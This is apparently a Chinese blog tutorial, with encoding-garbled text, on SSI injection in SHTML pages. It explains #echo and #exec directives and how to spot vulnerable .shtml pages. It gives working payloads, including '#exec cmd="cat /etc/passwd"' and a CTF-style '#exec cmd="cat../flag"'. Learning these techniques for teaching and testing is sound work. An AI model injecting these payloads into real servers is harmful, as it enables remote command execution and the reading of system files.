SSI注入漏洞
1.2 SSI語(yǔ)法
首先,介紹下SHTML,在SHTML文件中使用SSI指令引用其他的html文件(#include),此時(shí)服務(wù)器會(huì)將SHTML中包含的SSI指令解釋,再傳送給客戶端,此時(shí)的HTML中就不再有SSI指令了。比如說框架是固定的,但是里面的文章,其他菜單等即可以用#include引用進(jìn)來
①顯示服務(wù)器端環(huán)境變量<#echo>
本文檔名稱:
<!–#echo var="DOCUMENT_NAME"–>
現(xiàn)在時(shí)間:
<!–#echo var="DATE_LOCAL"–>
顯示IP地址:
<! #echo var="REMOTE_ADDR"–>
④直接執(zhí)行服務(wù)器上的各種程序<#exec>(如CGI或其他可執(zhí)行程序)
<!–#exec cmd="文件名稱"–>
<!--#exec cmd="cat /etc/passwd"-->
<!–#exec cgi="文件名稱"–>
<!--#exec cgi="/cgi-bin/access_log.cgi"–>
將某一外部程序的輸出插入到頁(yè)面中。可插入CGI程序或者是常規(guī)應(yīng)用程序的輸入,這取決于使用的參數(shù)是cmd還是cgi。
SSI挖掘思路
識(shí)別頁(yè)面是否包含.stm,.shtm和.shtml后綴
題目:
?
<!--#exec cmd="cat../flag"-->?
?
總結(jié)
 
                            
                        - 上一篇: 该如何用好EDIUS8?
- 下一篇: 宝宝博客
